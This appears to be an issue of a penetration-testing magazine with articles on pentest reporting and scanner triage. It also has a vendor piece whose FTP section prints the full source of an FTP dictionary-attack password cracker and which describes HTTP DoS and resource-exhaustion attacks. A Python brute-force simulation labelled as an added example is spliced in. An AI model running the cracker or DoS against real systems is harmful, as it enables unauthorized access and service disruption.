Improve your Firewall Auditing

As a penetration tester you have to be an expert in multiple technologies. Typically you are auditing systems installed and maintained by experienced people, often protective of their own methods and technologies. On any particular assessment testers may have to perform an analysis of Windows systems, UNIX systems, web applications, databases, wireless networking and a variety of network protocols and firewall devices. Any security issues identified within those technologies will then have to be explained in a way that both management and system maintainers can understand.

The network scanning phase of a penetration assessment will quickly identify a number of security weaknesses and services running on the scanned systems. This enables a tester to quickly focus on potentially vulnerable systems and services using a variety of tools that are designed to probe and examine them in more detail, e.g. web service query tools. However, this is only part of the picture, and a more thorough analysis of most systems will involve having administrative access in order to examine in detail how they have been configured. In the case of firewalls, switches, routers and other infrastructure devices this could mean manually reviewing the configuration files saved from a wide variety of devices. Although various tools exist that can examine some elements of a configuration, the assessment would typically end up being a largely manual process. Nipper Studio is a tool that enables penetration testers, and non-security professionals, to quickly perform a detailed analysis of network infrastructure devices. Nipper Studio does this by examining the actual configuration of the device, enabling a much more comprehensive and precise audit than a scanner could ever achieve.

www.titania.com
Table of Contents
200 OK on Audience, by Vijay Velu
Dreamwalker Software, by Craig Fox
by Scott Chester, Viviana Dragu, Ryan Bentley, Duane Baldwin and Chris Cronin
Dear Readers,

This time, we have decided to cover some topics which in our opinion don't get enough attention in the community. Most of the testers focus on technical issues and they usually forget how important it is to have an elegant and informative style of writing. Their clients often struggle when it comes to fixing the newly discovered vulnerabilities, mostly due to the testers' poor communication skills. Almost everyone gets the most fun from conducting the complex attacks, but we cannot forget how important it is to properly present the results, so the outcome can be really valuable to everyone involved.

In this issue, you will find many different ways of reporting. Some of them will be more complex and some of them will be as simple as they can be. As a reader, you have the wonderful possibility to check them all and choose the best option for yourself.

One would say: the whole publication about the reports? It is crazy, no one will read the entirety. Although we disagree with this saying, many of you might have a similar approach, so only the first four articles will be devoted to reporting. In the following sections, we will cover things such as vulnerability scanning, sockstress, wireless pentesting and even the recent PCI DSS changes.

If you enjoyed any part of this publication, don't hesitate to tell us about it at en@pentestmag.com

It might take you a few minutes to write an email, but your opinion is priceless and it is the best reward we can get.
Presentation

The presentation of the results is critical. You have to target it well according to the audience and you have to hit the bull's-eye. A bad presentation can really murder great penetration test results, especially if there are managers among the audience. The manager's mind tends to turn off when faced with technical terms.

What works very well for technical reports, from my experience, is to create a database where the customer is able to filter using parameters and sort according to the classification of issues. You can also use pivot tables (or a similar feature in the spreadsheet of your choice) to create summaries and different views of the data.

Several tips on how to organize your report:

Be in sync with your presentation. Try to follow a similar structure. Then the approach looks consistent and is easily understood by the receivers of the deliverables.

Decide on the form. Separation into several files and directories might be a good idea when there is a lot of technical information and logs. If it would make the report huge (even for appendices), use separate files. But be sure you reference those in the report. Also take care that there are not too many different files if not required.

Start with general information, and then get more technical. Try to follow the approach of telling a story. Give a preview of what will happen (executive summary), set up the scene (describe the scope, what was done), tell the main story (what was found, how critical it is, how it was found) and then happily ever after (remediation, next steps, etc.). Put the hard-core technical stuff in the appendices.

Document the scope. The scope has to be fixed with the customer to avoid any disputes in the end. It is very important to document the scope within the final deliverable. It will serve as a reference on what was targeted. If there are some parts that were (for some reason) excluded from the scope, those should be documented as well.

Document utilized methodologies. It is important to document the crucial parts of the activity as well as the findings. The pentester has to prove that his methodology is reasonably effective, repeatable and to some extent bulletproof. If you are using some of the well-established methodologies, do reference those. It might boost the credibility of your work.

Create a structured document. Always provide a document that has a reference matrix. It is a good idea to reference specific findings.

Use Appendixes. If there is a need to include technical documentation in the report (you don't want to deliver separate files), use appendixes. Those are usually at the end of the document, numbered alphabetically.

Keep the size of the report reasonable. It might be a good idea to keep the main report document reasonable in size. People like to print the document, and with a reasonable length it might be easier to navigate. Pasting the outputs of the tools in the Appendixes might enlarge the document dramatically.

Unless explicitly agreed with the customer, never use the output of the tools as a report. Managers will not understand the details of the findings and the work will not be treated as professional (sometimes not even by security people). For the price of the pentest, the company can buy and run Nessus itself.
CYBER SECURITY IN OIL AND GAS 2014
27-29 January 2014 | Abu Dhabi, U.A.E.
Register before November 15, 2013 and take advantage of the early bird rate.
For Sponsorship Opportunities, contact us at +971 4 884 1110
kristine.tuazon@caxtongroup.com
www.caxtongroup.com
Figure 4. Top 10 products with the most reported vulnerabilities. Report by Qualys
Default or easy passwords. These are probably the most dangerous and the most common security issues. How many of your Cisco routers have the default password "cisco"? How many Microsoft SQL servers have an empty password for the SA account? If you find these issues on your network, you probably have some serious gaps in your security. The examples above are probably easy to fix or discover. It is more difficult to fix, for example, Tomcat or JBoss servers with default accounts. During the installation process, Tomcat doesn't provide the administrator with an option to change the default password and installs itself with username "tomcat" and password "tomcat". Knowing these credentials, it is possible for a potential hacker to change the configuration of the web server or even deploy new applications, which usually provides full access to the server.

Insecure services or protocols. FTP, Telnet and HTTP are still widely used. All these protocols transmit credentials in clear text. Hackers can sniff a network, intercept traffic or perform Man-in-the-Middle attacks and gain unauthorised access to information. Telnet usually provides command line access to the target device, so the integrity or availability of information can be affected. Anonymous FTP servers can provide write access to the server, so hackers can store prohibited materials on them, such as cracked software, pirated movies etc.

Web application vulnerability scanning reports usually contain the following issues:

SQL injection and XSS vulnerabilities. These vulnerabilities happen because developers don't validate input or output parameters properly. An SQL injection vulnerability allows external attackers to put malicious SQL commands into URL parameters and manipulate backend databases: create, modify or delete tables, grab users' passwords, and upload malware to the server. XSS (Cross-site scripting) issues allow hackers to attack customers, which affects the company's reputation and damages the brand. These issues should be fixed as soon as possible.

Encryption issues. SSL v2 is currently considered insecure and was superseded by SSL v3 back in 1996. However, a large number of websites still support it. Recommendation? Disable it! All browsers released after 1997 support SSL v3, so there shouldn't be compatibility issues. If a user connects to a website (eCommerce, banking application etc.) using SSL v2, hackers sniffing the traffic have a very good chance of decrypting it and getting access to credentials. In addition, if you are running an online shop and process credit card details, having SSL v2 enabled on your website means failing PCI DSS compliance.

Click jacking and Cross-frame scripting. This is a very debatable topic and there are a lot of articles and talks about it at the time of writing this article. Should we rank this vulnerability as high critical or informational? Burp Suite reports XFS issues as informational (not even low), Acunetix and Netsparker
False positives

All reports (remember, ALL reports) contain false positives. Even if a vendor of a vulnerability scanner tells you that their product doesn't produce false positives, it is not exactly correct. Indeed, the vulnerability may be on the website, but the severity should always be questioned. All websites are different depending on the business requirements, and no security product has a signature database that fits them all. Some common false positives are listed below:

Outdated software. Most vulnerability scanners determine a software version based on the banner it presents. For example, when you connect to an Apache web server, headers or error messages usually tell you which version of the software is used. Can you trust this information? No. Administrators can easily change a version number to trick potential attackers. They can increase the version number to give the impression that they are running the latest version of the software. Or they may even want to decrease the version to create a honeypot, so that hackers spend their time attacking a less valuable asset. Sometimes updates don't increase the version number: for example, if you are running Apache on Red Hat, security patches won't affect the version.

Brute force attacks. It is very usual to see vulnerability scanners reporting that a web application is vulnerable to a brute force attack. How do they check it? They try the same credentials several times, usually five or ten times, and analyse the reaction to this activity. They expect that the web application will present an error after ten attempts saying that the account is locked and the user should contact the support department or use the forgotten password link. But what if the web application doesn't display an error but still blocks the account? This case is very difficult to handle and should be verified manually by the security analyst. The verification is very straightforward: just try to log in to the account after ten unsuccessful login attempts. If you can log in, then you have an issue. If not, mark the issue as a false positive.

Changed admin credentials or paths. One of the best practices is to assign the administrator account to the Guest user group and rename the real admin account to something not obvious, for example John.
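The brute-force false positive described above, reproduced in an added example that is not part of the article or of any scanner product: a constructed in-memory login service with a silent lockout, the scanner's "look for a lockout message after N failures" heuristic, and the analyst's manual verification (try the real password after N failures). The service, its messages and the credentials are all made up for the illustration.

```python
"""Why a scanner's brute-force finding can be a false positive (constructed example)."""
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

GENERIC_ERROR = "Invalid username or password"
WRONG_PASSWORD = "definitely-wrong"   # constructed guess used by both checks


@dataclass
class LoginService:
    """Constructed sample application: users maps username -> password.

    lockout_threshold=None disables lockout; loud_lockout=True makes the
    service announce the lockout, which is what scanners usually look for.
    """
    users: Dict[str, str]
    lockout_threshold: Optional[int] = 10
    loud_lockout: bool = False
    failures: Dict[str, int] = field(default_factory=dict)

    def login(self, user: str, password: str) -> Tuple[bool, str]:
        count = self.failures.get(user, 0)
        locked = self.lockout_threshold is not None and count >= self.lockout_threshold
        if not locked and self.users.get(user) == password:
            self.failures[user] = 0
            return True, "Welcome"
        # Failed (or locked): count it and decide whether to say so.
        self.failures[user] = count + 1
        now_locked = (self.lockout_threshold is not None
                      and self.failures[user] >= self.lockout_threshold)
        if now_locked and self.loud_lockout:
            return False, "Account locked, contact support"
        return False, GENERIC_ERROR      # silent lockout looks like any failure


def scanner_heuristic(service: LoginService, user: str, attempts: int = 10) -> str:
    """Scanner-style check: N bad logins, then look for a lockout message.

    A service that locks the account without *saying* so is still flagged;
    that is where the false positive comes from.
    """
    for _ in range(attempts):
        _, message = service.login(user, WRONG_PASSWORD)
        if "locked" in message.lower():
            return "not vulnerable"
    return "vulnerable to brute force"


def manual_verification(service: LoginService, user: str, real_password: str,
                        attempts: int = 10) -> str:
    """The analyst's check from the article: after N failures, does the
    correct password still work? If it does, the finding is real."""
    for _ in range(attempts):
        service.login(user, WRONG_PASSWORD)
    ok, _ = service.login(user, real_password)
    return "confirmed" if ok else "false positive"


def triage(users: Dict[str, str], user: str, **service_opts) -> Tuple[str, str]:
    """Run both checks against fresh copies of the same service so the
    scanner's verdict and the analyst's verdict can be compared."""
    scanner = scanner_heuristic(LoginService(dict(users), **service_opts), user)
    analyst = manual_verification(LoginService(dict(users), **service_opts),
                                  user, users[user])
    return scanner, analyst


if __name__ == "__main__":
    sample = {"alice": "correct-horse"}     # constructed credentials
    for opts in ({}, {"loud_lockout": True}, {"lockout_threshold": None}):
        print(opts, triage(sample, "alice", **opts))
```

Only the no-lockout case is a real finding; the silent-lockout case is the one the scanner gets wrong and the manual check corrects.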
False negatives

How can you find false negatives in the report? The simple answer: you can't. False negatives are vulnerabilities which were not discovered by the scanner but are present on the real site. The security analyst should be aware of when false negatives can happen and make sure they are discovered by manual testing.

Out-of-Band Authentication. In order to improve security, many companies implement two-factor authentication or user registration with out-of-band communications. This includes sending an SMS to the customer's mobile phone, calling the customer, sending emails or using a mobile application to log in. The tester should manually review the login process and see if there are potential security issues. Is the new password sent to the user in clear text? Is the SMS code predictable, for example incremental? Is it possible to hijack a customer account if a hacker has physical access to the phone? Create use or business cases and try to understand the end-to-end data flow to perform a comprehensive risk assessment.

Business logic flaws. For a complex application which gathers data from different sources and has multiple user profiles and products, each business transaction should be analysed for potential issues. Vulnerability scanners can tell you if input fields don't filter malicious code, but they can't tell you whether your business process is well designed or not. Do you remember the recent vulnerability in Skype? Hackers could hijack users' accounts by simply contacting the support department! The user validation was based on telling five contact details from the list, the email that was used during registration and a full name. All these details can be easily obtained or discovered, so a large number of accounts were compromised. Definitely a business process flaw.

Restricted pages and lack of privileges. A typical marketing website has on average two or three privilege levels (user level and admin), but a banking application may have more than a hundred different roles and hundreds of different privileges. In order to perform a comprehensive vulnerability assessment, you need to create an N*M matrix, where N is the number of privileges and M is the number of functions, and test all input parameters using different credentials. Vulnerability scanners can do a good job for small applications; however, complex web portals require a lot of manual configuration from the security analyst.
Risk matrix (rows are the consequence levels; the three columns give the resulting risk rating):

Consequences
Minor       MEDIUM   LOW      LOW
Moderate    HIGH     MEDIUM   LOW
Major       HIGH     HIGH     MEDIUM
Summary

The network and web application vulnerability management process is very important to keep the organisation secure and minimise the risk of compromise. Vulnerability scanners will help to proactively identify issues before external hackers can discover them. To achieve the best results, reports should be analysed and appropriate actions should be taken to mitigate the risks.

The security analyst should have experience and knowledge of common hacking attacks and mitigation strategies;
Obtain feedback from the IT team and senior management when categorising issues and assessing the security risk;
Try to reduce the number of false positives to make sure you focus on important issues;
Review the scope manually to ensure the vulnerability scanners have covered all the functions, inputs and services;
Keep records to show to external auditors, senior management or other team members.

Remember, the main purpose of the vulnerability management process is to reduce the risk to an acceptable level. Tools like vulnerability scanners can provide the data and perform some routine tasks, but team input is absolutely required to achieve the best results.
Glossary

Vulnerability assessment: A process for identifying inadequate computer and network security that causes technological weaknesses. Assessments also generally include methods for prioritizing and implementing additional security measures for fixing and protecting systems.
Application programming interface (API): In most procedural languages, an API specifies a set of functions or routines that accomplish a specific task or are allowed to interact with a specific software component.
Intrusion prevention systems (IPS), also known as intrusion detection and prevention systems (IDPS): network security appliances that monitor network and/or system activities for malicious activity.
Web application firewall (WAF): an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation.
Payment Card Industry Data Security Standard (PCI DSS): a proprietary information security standard for organizations that handle cardholder information for the major debit, credit, prepaid, e-purse, ATM, and POS cards.
SA account: The SA account is created during the installation process of MS SQL Server and has full rights in the SQL Server environment. By default, the SA password is blank (NULL), unless you change the password when you run the MSDE Setup program.
Out-of-Band Authentication: the use of two separate networks working simultaneously to authenticate a user.
Use case: In software and systems engineering, a use case is a list of steps, typically defining interactions between a role (known in Unified Modeling Language (UML) as an actor) and a system, to achieve a goal. The actor can be a human or an external system.
Dreamwalker Software
by Craig Fox

At Dreamwalker Software, we create tools aimed at IT security professionals and hobbyists alike. We also offer penetration testing/ethical hacking services for small companies, which has only recently been implemented. Generally speaking, most of our software is free as we rely on donations to help keep us running and we enjoy sharing tools and code at no cost, but this will only last as long as donations remain steady, so if you find any of the software/information below useful please consider helping us out by sharing our site, dusting the cobwebs from your wallet and dropping us some gold; we'll love you long time. The aim of this article is to inform you about the latest Dreamwalker software by discussing its origin and usage and providing practical scenarios.
Technical stuff

This tool is a compact vulnerability scanner for web servers that has a plethora of features and is constantly being updated. Currently it's coded in VC++ using .NET 3.5 and Winsock/WinInet, but we're also working on a cross-platform Java version, which will lose some speed but is worth it for the portability. The download includes a Win32 compiled version.
Scenario

You're testing a website for vulnerabilities and you decide to gain some information on the server in an automated manner. With this tool you perform a scan and await the results; the results show that ports 80, 21, 22 and 443 are open. You now know that HTTP, FTP, SSH and SSL services are running on this server, which opens up several opportunities for exploits and entry points. Furthermore, you find that it has a reachable login page, a potential SQL injection page, robots.txt and sitemap.xml. Using this you may be able to use SQL injection to exploit the database and server through the login page; you could also look at the robots.txt file to see which files/directories they do/don't want search engines to see, and also look at the sitemap.xml file. Both methods give you further information on the target. You later decide to stress test the server to see how it handles load, along with how the staff respond, by launching a DDoS attack.
Features

URL Scanning: This is arguably the best feature. Lucidity will perform URL-based scanning on files and directories to find potential vulnerabilities. This ranges from SQL injection potential, FrontPage-enabled servers and login pages to doxing information such as robots.txt, sitemap, configs etc.
TCP Port Scanning: This is a socket connect based scan which doesn't go through a whole port range but scans the most likely relevant ports, purely for speed's sake (bear in mind this is just a quick, non-comprehensive scan tool), such as FTP, HTTP, SSL, SMTP, TELNET, SSH, POP3, MySQL and so on, to help you identify the services running and thus help you map out potential weaknesses and entry points.
HTTP Denial Of Service attack: This is a work in progress due to some recent bugs, but basically it sends 50,000 TCP socket requests to port 80 in an attempt to disrupt the service.
Technical stuff

This is coded in C++ but uses WinInet; it is completely open source and the download includes a Win32 compiled version, along with the username.txt and passwords.txt files to get you started with some basic combinations.

Scenario

During testing, you decide that a good entry point into their system is via FTP, which holds a lot of company-sensitive documentation. You try to log in anonymously but that is disabled; as you need access, more specifically read/write access, you decide to crack an account. You then run this tool and allow it time to

Features

It's incredibly simple in its code and concept: it performs a remote dictionary attack on the targeted web server until a successful authentication is met. You can add as much to the username and password file as you want in order to increase your chances, but without me blabbering on, I'll paste the code here as it is so small:

Listing 1. Source code of OpenFTP
    #include <windows.h>
    #include <wininet.h>
    #include <iostream>
    #include <string>
    #include <fstream>
    #pragma comment(lib, "wininet.lib")   // link against WinInet

    int main()
    {
        HANDLE hConsole = GetStdHandle(STD_OUTPUT_HANDLE);  // for the coloured output
        std::string target, usernames, passwords;
        int attempts = 0;
        char temp;

        std::cout << "Target FTP host: ";
        std::cin >> target;

        //get files
        std::ifstream user_reader("usernames.txt");
        std::ifstream pass_reader("passwords.txt");
        //file error handling
        if((!user_reader)||(!pass_reader))
        {
            std::cout << "Could not open usernames.txt or passwords.txt" << std::endl;
            return 1;
        }

        // ANSI WinInet entry points, so the std::string buffers can be passed directly
        HINTERNET hInternet = InternetOpenA("OpenFTP", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
        HINTERNET hFtpSession = NULL;

        //first username; every password is tried against it before moving on
        getline(user_reader,usernames);
        while(!user_reader.eof())
        {
            SetConsoleTextAttribute(hConsole, 7);
            attempts++;
            getline(pass_reader,passwords);
            std::cout<<"Trying username "+usernames+" with password "+passwords+" attempts "
                     <<attempts<<" ";
            //Connect to FTP server with provided credentials
            hFtpSession = InternetConnectA(hInternet,target.c_str(),INTERNET_DEFAULT_FTP_PORT,
                usernames.c_str(),passwords.c_str(),INTERNET_SERVICE_FTP,INTERNET_FLAG_PASSIVE,0);
            //is password cracked?
            if(!hFtpSession)
            {
                SetConsoleTextAttribute(hConsole, 12);
                std::cout<<"= FAIL"<<std::endl;   // nothing to close: the handle is NULL
            }
            else
            {
                SetConsoleTextAttribute(hConsole, 10);
                std::cout<<"\n\nCracked "+target+"\nThe username is: \""+usernames
                           +"\"\nPassword is: \""+passwords+"\""<<std::endl;
                InternetCloseHandle(hFtpSession);
                break;
            }
            if(pass_reader.eof())
            {
                //reset pass file
                pass_reader.clear();
                pass_reader.seekg(0,std::ios::beg);
                //get next username
                getline(user_reader,usernames);
            }
        }
        InternetCloseHandle(hInternet);
        pass_reader.close();
        user_reader.close();
        std::cout<<"\nFinished, please close this application"<<std::endl;
        std::cin>>temp;
        return 0;
    }
As you can see the code is simple, but very effective. You'll notice how the loop works by checking each password iteration against a username before moving on to the next. This was a function that we created a while back when we did a proof-of-concept dictionary and brute force cracker, and we haven't changed it one bit, aside from the conditions.

Even though it's open source, the code unfortunately isn't cross-platform. While generally speaking our open source tools aim to be just that, in this particular case WinInet was very simple and useful for doing this; however, it would be quite easy to port this to other languages and/or use different resources (i.e. a networking lib etc.) to compile for other platforms.
Technical Stuff

This is coded in VC++ using .NET 3.5+, and a Win32 version is included in the download.

Scenario

You're on a local network in a Windows environment, it's an early stage of the testing and you decide to start gaining information on the target. You run this against a local machine and find that it accepts the null session and also shows the shares. This information can be used to compromise the system.
Features

The way it works is you'll put in a target system (WAN or LAN) and it will run Windows-based commands, pipe them, store them to a temporary file and display the results. It will do things like pinging, performing a zone transfer, trying a null session, attempting to access shares, tracert and so on, in a neat and concise manner, providing you with a slick, easy-to-use automated tool for the reconnaissance/early stages of a penetration test on a Windows-based environment. At first, we created this tool as a command line tool which saves the results to a file, but due to user feedback and requests, we've done it like this for efficiency, clarity and a better end user experience.
Scenario

You are stress-testing a web server for DDoS conditions; it has very good IDS hardware and software and you just don't have the bots or bandwidth resources to slow this server down. After a little manual probing, you find several resources on the server which are rather CPU and memory intensive, so you run this tool against all the resources via different URLs in a scripted manner which requests large files and large database queries etc., potentially crashing the server.
Scenario

You are testing locally on a client; you're on a shared machine and need to hide some information on that computer without raising suspicion. You use this tool with the host C:\windows\system32\calc.exe and create an ADS to a hidden text document, which you successfully hide, open, write, save and close as many times as you wish and later extract. This can also be used for exploiting, but that is a little beyond this simple scenario.
Summary

Well, that's all, just a few of our tools discussed and outlined. I hope you found this article interesting. Feel free to contact us if you have any questions, requests etc.
Lead tester and coder Craig Fox started out programming and studying IT security in his teen years, doing multiple official courses along with self-training. He has worked for several companies employing his technological skill set and is very active within the industry sector.